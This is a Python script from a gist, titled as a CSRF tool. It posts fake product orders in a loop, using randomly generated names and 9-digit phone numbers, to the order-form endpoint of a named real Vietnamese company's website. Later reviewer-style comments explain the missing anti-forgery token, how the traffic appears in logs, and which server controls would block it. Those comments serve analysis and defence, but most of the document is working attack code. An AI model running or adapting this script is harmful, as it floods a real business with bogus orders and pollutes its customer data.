@anhtran
Created June 2, 2015 05:59
"""
Usage notes for xsrf_bkav.py.

Requirements:
    requests
    names
    click

Executing:
    python xsrf_bkav.py fuckit [number of requests]
"""
import requests
import names
import random
import json
import click
# Destination of every POST issued below: a portlet action URL whose
# javax.portlet.action parameter is processAddProduct, addressed over plain http.
# NOTE(review): the p_p_id / p_p_lifecycle parameters look like a Liferay portal
# URL; if so, the query string carries no p_auth token, and enforcing that token
# on this action is the server-side control to confirm. Whether the endpoint
# accepted requests in this form cannot be told from this file.
url = 'http://www.bkav.com.vn/b-category?p_p_id=buyproductaction_WAR_BkavPaymentportlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&_buyproductaction_WAR_BkavPaymentportlet_javax.portlet.action=processAddProduct'
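def rand_x_digit_num(x, leading_zeroes=True):
    """Return a random number that is exactly ``x`` decimal digits wide.

    Args:
        x: Number of digits wanted.
        leading_zeroes: When true (the default) the result is a ``str`` that
            may start with zeroes. When false the result is an ``int`` drawn
            from ``10**(x-1)`` to ``10**x - 1``, so its first digit is never 0.

    Returns:
        A zero-padded digit string, or an int when ``leading_zeroes`` is false.
    """
    if not leading_zeroes:
        # The two modes return different types (int here, str below); callers
        # that need a uniform type have to convert this result themselves.
        return random.randint(10**(x-1), 10**x-1)
    if x > 6000:
        # Wide results are assembled one digit at a time instead of formatting
        # a single huge integer. The 6000 cut-over is the author's choice; the
        # reason for that exact value is not stated in the file.
        # range() replaces the Python 2-only xrange(), which raises NameError
        # on Python 3 the first time this branch runs.
        return ''.join(str(random.randint(0, 9)) for _ in range(x))
    return '{0:0{x}d}'.format(random.randint(0, 10**x-1), x=x)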
def get_data(name, phone):
    """Build the order-form fields for one submission.

    Only ``name`` and ``phone`` vary between calls. Every other field
    (province, district, address, quantity, payment type, card type) is a
    fixed literal, so all submissions built here share those values; on the
    receiving side that constant tuple is a usable grouping key when
    reviewing or filtering orders.

    Args:
        name: Value stored under the ``full-name`` field.
        phone: Value stored under the ``customer-phone`` field.

    Returns:
        A new dict mapping form field names to values, ``buytype`` first.
    """
    prefix = '_buyproductaction_WAR_BkavPaymentportlet_'
    portlet_fields = (
        ('full-name', name),
        ('customer-phone', phone),
        ('provinceId', 2),
        ('districtId', 31),
        ('addressId', '01 Công Xã Paris'),
        # This field's name is the bare portlet prefix with nothing after it.
        ('', 'ĐẶT MUA'),
        ('bphoneQuantity', 1),
        ('paymentType', 1),
        ('cardType', 'card3'),
        ('khacten', ''),
    )
    form = {'buytype': 1}
    for suffix, value in portlet_fields:
        form[prefix + suffix] = value
    return form
# Despite its name and its HTTP-header-style keys, this dict is never passed as
# request headers: send_it_out() merges the order fields into it and serialises
# the whole thing as the JSON request body. Host, Content-Length, Cookie and the
# rest therefore travel as JSON keys inside the body, which makes the body shape
# a distinctive marker when reading server-side request logs.
# NOTE(review): the Cookie and Referer values name ASP.NET and third-party
# domains and look copied from an unrelated capture; confirm before treating
# them as meaningful.
payload = {
    "Host": "www.bkav.com.vn",
    "Connection": "keep-alive",
    "Content-Length": 888,
    "Origin": "https://www.bkav.com.vn",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
    "Content-Type": "application/json",
    "Accept": "*/*",
    "Referer": "http://www.bkav.com.vn/b-category/-/product/377",
    "Accept-Encoding": "gzip,deflate,sdch",
    "Accept-Language": "fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
    "Cookie": "ASP.NET_SessionId=j1r1b2a2v2w245; GSFV=FirstVisit=; GSRef=https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CHgQFjAA&url=https://www.mywbsite.fr/&ei=FZq_T4abNcak0QWZ0vnWCg&usg=AFQjCNHq90dwj5RiEfr1Pw; HelpRotatorCookie=HelpLayerWasSeen=0; NSC_GSPOUGS!TTM=ffffffff09f4f58455e445a4a423660; GS=Site=frfr; __utma=1.219229010.1337956889.1337956889.1337958824.2; __utmb=1.1.10.1337958824; __utmc=1; __utmz=1.1337956889.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)"
}
# These are the headers actually attached to each request. They are identical
# for every request: one fixed User-Agent string, 'Accept-Encoding: none', and
# no Cookie, Origin, Referer or Content-Type entry.
# NOTE(review): requests is not expected to add a Content-Type for a string
# body, so the JSON body presumably arrives without one; verify against a
# captured request.
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) '
                  'Chrome/23.0.1271.64 Safari/537.11',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
    'Accept-Encoding': 'none',
    'Accept-Language': 'en-US,en;q=0.8',
    'Connection': 'keep-alive'
}
@click.group()
def cmd():
    # Root click group. It performs no work of its own; the sub-command is
    # attached to it with add_command() near the end of the file.
    return None
# Sub-command that submits the order form `num_requests` times in sequence.
# click passes the positional argument as a string; it is converted with int()
# in the loop header, so a non-numeric value raises ValueError there.
#
# What the receiving side sees per request: a POST to `url` with the static
# `headers` dict, no session cookie header, and a JSON body mixing header-named
# keys with order fields in which only the full name and a 9-digit phone string
# change. Per-client rate limits on the order action, a validated per-session
# token, and confirming the phone number before an order is recorded are the
# controls this pattern runs into.
@click.command(name='fuckit')
@click.argument('num_requests')
def send_it_out(num_requests):
    """
    Enter the number of requests to get start.
    """
    for i in range(0, int(num_requests)):
        try:
            # `d` is an alias of the module-level `payload`, not a copy, so
            # update() writes the order fields into that shared dict. The same
            # keys are overwritten on every pass.
            d = payload
            d.update(get_data(names.get_full_name(), rand_x_digit_num(9)))
            # The merged dict is sent as a JSON string body; only `headers`
            # become HTTP headers. Each call waits at most 3 seconds.
            r = requests.post(url, data=json.dumps(d), headers=headers, timeout=3)
            # Only a 200 status is reported; any other status produces no output.
            if r.status_code == 200:
                click.echo(click.style('--> ', fg='green') + '[{}] {}'.format(i+1, d['_buyproductaction_WAR_BkavPaymentportlet_full-name']))
        except requests.exceptions.Timeout:
            # Timeout is the only exception handled; any other error raised by
            # requests propagates and ends the run.
            click.echo(click.style('--> Timeout', fg='yellow'))
        # Dead store: `d` is rebound to `payload` at the top of the next pass.
        # NOTE(review): the page lost its indentation, so the nesting level of
        # this line is a best guess; it has no effect at any level.
        d = ''
# Attach the sub-command to the root group so that it can be selected by name
# on the command line.
cmd.add_command(send_it_out)
# Run the click group only when the file is executed as a script.
if __name__ == '__main__':
    cmd()